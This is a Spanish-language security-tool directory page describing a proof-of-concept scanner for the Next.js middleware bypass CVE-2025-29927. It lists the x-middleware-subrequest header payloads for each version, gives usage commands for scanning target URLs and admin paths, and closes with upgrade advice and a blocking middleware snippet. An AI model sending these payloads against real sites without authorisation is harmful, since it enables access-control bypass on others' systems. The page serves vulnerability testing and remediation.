Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-nextjs-CVE-2025-29927 — Escáner automatizado de PoC para la vulnerabilidad de omisión de middleware de Next.js CVE-2025-29927. Prueba múltiples payloads de x-middleware-subrequest a través de URLs objetivo con escaneo concurrente y exportación JSON. | Kitploit
Herramientas/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Escáner automatizado de PoC para la vulnerabilidad de omisión de middleware de Next.js CVE-2025-29927. Prueba múltiples payloads de x-middleware-subrequest a través de URLs objetivo con escaneo concurrente y exportación JSON.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner de Vulnerabilidad Middleware Subrequest de Next.js

Una herramienta robusta de prueba de concepto (PoC) para detectar la vulnerabilidad de middleware de Next.js (CVE-2025-29927).

Visión General

Esta herramienta prueba una vulnerabilidad crítica en aplicaciones Next.js donde la cabecera x-middleware-subrequest puede usarse para eludir verificaciones de seguridad implementadas en el middleware. El exploit consiste en enviar solicitudes HTTP con cabeceras maliciosas específicas, que varían según la versión de Next.js.

Cómo Funciona el Exploit

Según la investigación, existen diferentes payloads para diferentes versiones de Next.js:

  1. Versiones anteriores a la 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versiones a partir de la 12.2:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    o

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

(si la aplicación usa el directorio src)

  • Versiones más recientes (como 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    o

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    
  • Nuestra PoC prueba todos estos payloads automáticamente e informa cuál tuvo éxito.

    Funcionalidades

    • Prueba de uno o múltiples objetivos
    • Escaneo concurrente con multithreading
    • Rutas de solicitud personalizables
    • Prueba automática de todos los payloads posibles
    • Salida detallada y coloreada en la terminal
    • Exportación de resultados en JSON
    • Manejo robusto de errores
    • Detección integral de vulnerabilidades

    Requisitos

    • Python 3.7+
    • Paquetes necesarios:
      • requests
      • colorama

    Instalación

    root@kitploit:~
    # Clone el repositorio o descargue los archivos
    # Navegue hasta el directorio
    cd poc-nextjs-2025
    
    # Instale los paquetes necesarios
    pip install -r requirements.txt
    

    Uso

    root@kitploit:~
    python main.py -u https://ejemplo.com   # Probar una sola URL
    python main.py -f objetivos.txt         # Probar múltiples URLs desde un archivo
    

    Argumentos de Línea de Comandos

    OpciónDescripción
    -u, --url URLURL objetivo para escanear
    -f, --file ARCHIVOArchivo que contiene múltiples URLs para escanear (una por línea)
    -p, --paths RUTASLista separada por comas de rutas a probar (por defecto: rutas comunes)
    -t, --threads NNúmero de hilos concurrentes (por defecto: 5)
    -o, --output ARCHIVOGuardar resultados en un archivo JSON
    --timeout NTiempo de espera de la solicitud en segundos (por defecto: 10)

    Ejemplos

    root@kitploit:~
    # Escaneo básico de un solo objetivo
    python main.py -u https://ejemplo.com
    
    # Escanear múltiples objetivos con rutas personalizadas
    python main.py -f objetivos.txt -p /api/users,/admin,/dashboard
    
    # Escanear con mayor concurrencia y tiempo de espera más largo
    python main.py -u https://ejemplo.com -t 10 --timeout 15
    
    # Guardar resultados en un archivo JSON
    python main.py -u https://ejemplo.com -o resultados_scan.json
    

    Metodología de Detección

    El escáner funciona mediante:

    1. Envío de una solicitud normal al objetivo
    2. Envío de solicitudes con diferentes variaciones de la cabecera x-middleware-subrequest según las versiones de Next.js
    3. Comparación de las respuestas para identificar indicadores de vulnerabilidad:
      • Solicitud normal bloqueada (4xx/5xx) pero solicitud de exploit permitida (2xx)
      • Diferencia significativa en el contenido de la respuesta
      • Indicadores de bypass de autenticación/autorización

    Mitigación

    Si descubre aplicaciones vulnerables, aplique estas mitigaciones:

    • Actualice a las versiones 14.2.25 o 15.2.3 o posteriores de Next.js
    • Implemente un middleware que bloquee solicitudes con la cabecera x-middleware-subrequest
    root@kitploit:~
    export function middleware(request: NextRequest) {
      if (request.headers.has('x-middleware-subrequest')) {
        return new Response('Unauthorized', { status: 401 });
      }
      return NextResponse.next();
    }
    
    Descargar herramienta